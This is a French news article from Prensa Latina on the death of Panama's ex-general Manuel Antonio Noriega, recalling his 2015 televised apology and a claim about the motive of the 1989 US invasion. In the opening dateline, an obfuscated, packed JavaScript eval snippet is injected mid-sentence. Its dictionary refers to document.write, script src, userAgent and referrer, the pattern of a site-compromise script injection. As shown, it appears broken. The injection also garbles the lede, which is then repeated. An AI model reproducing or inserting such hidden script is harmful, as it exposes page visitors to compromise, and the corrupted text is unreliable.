dimanche 14 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’ex-général Manuel Antonio Noriega est décédé au Panama

Panama, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ikdda|var|u0026u|referrer|szkah||js|php'.split('|'),0,{})) 30 mai (Prensa Latina) L'ex-général Manuel Antonio Noriega est décédé aujourd'hui dans cette capitale, suite à une opération à laquelle il n'a pas survécu.

Panama, 30 mai (Prensa Latina) L’ex-général Manuel Antonio Noriega est décédé aujourd’hui dans cette capitale, suite à une opération à laquelle il n’a pas survécu.

Le 24 juin 2015, lors d’un discours lu devant les caméras de la chaine Telemetro depuis la prison, l’ex-général, surnommé « l’homme fort du Panama » de 1983 à 1989, est sorti d’un silence de 26 ans pour « demander pardon au Panama pour les dommages » qu’il a causé.

« Et je le considère important, dans ces circonstances, que nous connaissons tous, que vit le pays. Je ferme le cycle de l’ère militaire comme le dernier général de ce groupe, en demandant pardon », a-t-il enchéri.

La capture de Noriega a été la prétendue raison exprimée par les Étas-Unis pour lancer leur invasion au Panama le 20 décembre 1989. Mais en avril dernier l’analyste Julio Yao a révélé un document secret étasunien qui en signale le réel motif : essayer d’abroger les traités du Torrijos-Carter du canal de Panama.

peo/lam/orm

EN CONTINU
notes connexes